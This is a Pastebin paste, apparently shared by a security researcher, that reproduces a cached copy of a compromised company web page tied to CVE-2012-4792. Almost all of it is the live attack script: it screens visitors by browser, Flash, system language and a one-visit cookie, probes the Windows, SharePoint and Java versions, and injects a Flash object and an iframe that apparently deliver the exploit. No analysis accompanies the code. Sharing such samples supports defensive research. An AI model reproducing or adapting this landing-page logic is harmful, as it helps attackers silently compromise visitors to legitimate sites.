eromang

capstoneturbine.com CVE-2012-4792

Jan 1st, 2013
771
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  3. <base href="http://www.capstoneturbine.com/_include/config.html"><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google&#39;s cache of <a href="http://www.capstoneturbine.com/_include/config.html" style="text-decoration:underline;color:#00c">http://www.capstoneturbine.com/_include/config.html</a>. It is a snapshot of the page as it appeared on 18 Dec 2012 16:10:40 GMT. The <a href="http://www.capstoneturbine.com/_include/config.html" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:9Na-PeIEuBsJ:www.capstoneturbine.com/_include/config.html&amp;hl=en&amp;tbo=d&amp;gl=lu&strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div>
  4. <div>&nbsp;</div></div></div><div style="position:relative">
  5. <html>
  6. <head>
  7. <script src=deployJava.js></script>
  8. <script type="text/javascript">
  9. function getCookieVal (offset)
  10. {
  11.     var endstr = document.cookie.indexOf (";", offset);
  12.     if (endstr == -1)
  13.     {
  14.         endstr = document.cookie.length;
  15.     }
  16.     return unescape(document.cookie.substring(offset, endstr));
  17. }
  18. function GetCookie (name)
  19. {
  20.     var arg = name + "=";
  21.     var alen = arg.length;
  22.     var clen = document.cookie.length;
  23.     var i = 0;
  24.     while (i < clen)
  25.        {
  26.        var j = i + alen;
  27.        if (document.cookie.substring(i, j) == arg)
  28.           return getCookieVal (j);
  29.        i = document.cookie.indexOf(" ", i) + 1;
  30.        if (i == 0)
  31.           break;
  32.        }
  33.     return null;
  34.     }
  35. function SetCookie (name, value)
  36. {
  37.     var argv = SetCookie.arguments;
  38.     var argc = SetCookie.arguments.length;
  39.     var expires = (2 < argc) ? argv[2] : null;
  40.     var path = (3 < argc) ? argv[3] : null;
  41.     var domain = (4 < argc) ? argv[4] : null;
  42.     var secure = (5 < argc) ? argv[5] : false;
  43.     document.cookie = name + "=" + escape (value) +
  44.       ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
  45.       ((path == null) ? "" : ("; path=" + path)) +
  46.       ((domain == null) ? "" : ("; domain=" + domain)) +
  47.          ((secure == true) ? "; secure" : "");
  48. }
  49. function DisplayInfo()
  50. {
  51.     var expdate = new Date();
  52.     var visit;
  53.     expdate.setTime(expdate.getTime() +  (24 * 60 * 60 * 1000*7 ));
  54.     if(!(visit = GetCookie("visit")))
  55.     visit = 0;
  56.     visit++;
  57.     SetCookie("visit", visit, expdate, "/", null, false);
  58.     return visit;
  59. }
  60. var ua = window.navigator.userAgent.toLowerCase();
  61.  
  62. if (ua.indexOf('msie 8.0') <0)
  63. {
  64.     location.href="about:blank";
  65. }
  66.  
  67.     var f = 0;
  68.     try {
  69.         f = new ActiveXObject('ShockwaveFlash.ShockwaveFlash');
  70.     }
  71.     catch (e) {
  72.     }
  73.     var g=typeof f;
  74.  
  75.     if(g!="object")
  76.     {
  77.         location.href="about:blank";
  78.     }
  79.     var h=navigator.systemLanguage.toLowerCase();
  80.    
  81.     if(h!="zh-cn" && h!="en-us" && h!= "zh-tw")
  82.     {
  83.  
  84.         location.href="about:blank";
  85.     }
  86.  
  87. var num=DisplayInfo();
  88. if(num >1)
  89. {
  90.     location.href="about:blank";
  91. }
  92. function download()
  93. {  
  94.     var xmlhttp;
  95.       try
  96.       {
  97.         xmlhttp = new XMLHttpRequest();
  98.       }
  99.       catch (e)
  100.       {
  101.         var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0','MSXML2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP','Microsoft.XMLHTTP' );
  102.         var success = false;
  103.         for (var i=0;i < XMLHTTP_IDS.length && !success; i++)
  104.         {
  105.           try
  106.           {
  107.              xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]);
  108.              success = true;
  109.           } catch (e)
  110.           {}
  111.         }
  112.      }
  113.     function callback()
  114.     {
  115.         if(xmlhttp.readyState==4)
  116.         {
  117.             if(xmlhttp.status==200)
  118.             {
  119.                 var temp=ua.replace(/ /g,"");
  120.                 if (temp.indexOf("nt6.1")>-1) {
  121.                
  122.                
  123.                     var key = "";
  124.                     var ma = 0;
  125.                     try {
  126.                         ma = new ActiveXObject("SharePoint.OpenDocuments.4");
  127.                     }
  128.                     catch (e) {
  129.                     }
  130.                     var mb = 0;
  131.                     try {
  132.                         mb = new ActiveXObject("SharePoint.OpenDocuments.3");
  133.                     }
  134.                     catch (e) {
  135.                     }
  136.                    
  137.                     if ((typeof ma) == "object" && (typeof mb) == "object") {
  138.                         key = "girl";  
  139.                     }
  140.                     else if ((typeof ma) == "number" && (typeof mb) == "object") {
  141.                         key = "boy";    
  142.                     }
  143.                    
  144.                    
  145.                     if (key == "girl") {    
  146.            
  147.                         document.getElementById('test').innerHTML="true";  
  148.                         document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  149.                        
  150.                     }
  151.                     if (key == "boy") {    
  152.                     document.getElementById('test').innerHTML="false";
  153.                         document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  154.                        
  155.                     }
  156.                    
  157.                     if (key == "") {
  158.                         if ((deployJava.versionCheck('1.6.0+') == true) && (deployJava.versionCheck('1.7.0+') == false)) {
  159.                        
  160.                            
  161.                             document.getElementById('test').innerHTML="default";
  162.                             document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  163.                            
  164.                         }
  165.                     }
  166.                 }
  167.                 if(temp.indexOf("nt5.1")>-1)
  168.                 {
  169.                
  170.                     document.getElementById('test').innerHTML="cat";
  171.                     document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  172.                            
  173.                 }  
  174.                
  175.            
  176.             }
  177.         }
  178.     }
  179.     xmlhttp.open("get", "xsainfo.jpg", true);  
  180.     xmlhttp.onreadystatechange = callback;
  181.     xmlhttp.send(null);
  182. }
  183.  
  184. </script>
  185. </head>
  186. <body onload="download()">
  187. <div id=test>hello</div>
  188. </body>
  189. </html>
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×